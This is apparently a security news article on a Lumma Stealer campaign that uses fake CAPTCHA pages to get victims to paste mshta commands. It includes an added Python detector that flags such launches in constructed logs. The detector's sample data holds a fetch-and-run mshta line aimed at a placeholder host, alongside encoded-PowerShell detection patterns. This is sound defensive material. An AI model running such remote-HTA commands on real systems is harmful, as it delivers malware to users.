Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the notorious Lumma information stealer.
“The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News.
“The campaign also spans multiple industries, including healthcare, banking, and marketing, with the telecom industry having the highest number of organizations targeted.”
The attack chain begins when a victim visits a compromised website, which directs them to a bogus CAPTCHA page that specifically instructs the site visitor to copy and paste a command into the Run prompt in Windows. That command uses the native mshta.exe binary to download and execute an HTA file from a remote server.
It is worth noting that a previous iteration of this technique, widely referred to as ClickFix, involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.
The HTA file, in turn, executes a PowerShell command to launch a next-stage payload, a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before taking steps to bypass the Windows Antimalware Scan Interface (AMSI) in an effort to evade detection.
“By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all of the necessary steps outside of the browser context,” Fróes explained.
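The delivery chain described above leaves a recognisable trace in endpoint process-creation telemetry: a child of explorer.exe (the Run prompt) that is either mshta.exe pointed at a remote URL, or powershell.exe carrying a Base64-encoded command. The script below is an added example, not code from the Netskope report or from any vendor product; it scans a constructed, simplified Sysmon-style log (the `ParentImage=|Image=|CommandLine=` layout and the host `example.invalid` are assumptions made for the example) and decodes the `-EncodedCommand` argument, which PowerShell expects as Base64 over UTF-16LE, so an analyst sees the plaintext.

```python
"""Flag process-creation events matching the fake-CAPTCHA / ClickFix delivery
chain: a command pasted into the Windows Run prompt (parent explorer.exe) that
launches mshta.exe against a remote HTA, or Base64-encoded PowerShell.
Log format and sample lines are constructed for this example."""
import base64
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Accepts the documented abbreviations of -EncodedCommand (-e, -ec, -en, -enc).
ENC_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


@dataclass
class Event:
    parent: str
    image: str
    cmdline: str


def parse_event(line):
    """Parse 'ParentImage=...|Image=...|CommandLine=...' (constructed format).
    The command line may itself contain '|' or '=', so split at most twice and
    cut each field on its first '='."""
    fields = {}
    for part in line.split("|", 2):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return Event(fields.get("ParentImage", ""), fields.get("Image", ""),
                 fields.get("CommandLine", ""))


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent
    or not valid Base64/UTF-16LE (PowerShell's required encoding)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Findings for one event; an empty list means nothing suspicious."""
    findings = []
    image, parent = basename(event.image), basename(event.parent)
    from_run_prompt = parent == "explorer.exe"
    if image == "mshta.exe" and URL_RE.search(event.cmdline):
        findings.append("mshta.exe executing remote HTA"
                        + (" from Run prompt" if from_run_prompt else ""))
    if image in ("powershell.exe", "pwsh.exe") and from_run_prompt:
        decoded = decode_encoded_command(event.cmdline)
        if decoded is not None:
            findings.append(f"encoded PowerShell from Run prompt: {decoded!r}")
    return findings


def scan(lines):
    """(line index, finding) pairs over a list of raw log lines."""
    return [(i, f) for i, line in enumerate(lines) for f in classify(parse_event(line))]


# Constructed sample: a harmless encoded command stands in for the real payload.
SAMPLE_ENC = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    # benign: local HTA started from a shell, no remote URL
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\mshta.exe"
    r"|CommandLine=mshta.exe C:\Tools\inventory.hta",
    # suspicious: Run prompt launching mshta against a remote HTA (placeholder host)
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe"
    r"|CommandLine=mshta https://example.invalid/verify.hta",
    # suspicious: Run prompt launching encoded PowerShell (ClickFix-style)
    r"ParentImage=C:\Windows\explorer.exe|Image=" + PS
    + "|CommandLine=powershell.exe -w hidden -enc " + SAMPLE_ENC,
    # benign: encoded PowerShell from a service host, not the Run prompt
    r"ParentImage=C:\Windows\System32\svchost.exe|Image=" + PS
    + "|CommandLine=powershell.exe -enc " + SAMPLE_ENC,
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_LOG):
        print(f"line {idx}: {finding}")
```

The parent-process condition is what keeps the rule quiet: encoded PowerShell under a service host or scheduled task is common in managed environments, whereas the same command line spawned directly by explorer.exe is exactly the user-pasted step the campaign depends on.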
“The Lumma Stealer operates using the malware-as-a-service (MaaS) model and has been extremely active in the past months. By using different delivery methods and payloads it makes detection and blocking of such threats more complex, especially when abusing user interactions within the system.”
As recently as this month, Lumma has also been distributed via roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect users to download password-protected archives.
These archive files contain an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, according to Sekoia researcher crep1x. In early 2023, threat actors leveraged a similar technique to spin up over 1,300 domains masquerading as AnyDesk in an effort to push the Vidar Stealer malware.
The development comes as Barracuda Networks detailed an updated version of the Phishing-as-a-Service (PhaaS) toolkit known as Tycoon 2FA that includes advanced features to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”
These include using legitimate (possibly compromised) email accounts to send phishing emails and taking a series of steps to prevent analysis by detecting automated security scripts, listening for keystrokes that suggest web inspection, and disabling the right-click context menu.
Social engineering-oriented credential harvesting attacks have also been observed leveraging avatar provider Gravatar to mimic various legitimate services like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials,” SlashNext Field CTO Stephen Kowski said.
“Instead of generic phishing attempts, attackers tailor their fake profiles to resemble the legitimate services they’re mimicking closely through services that are not often known or protected.”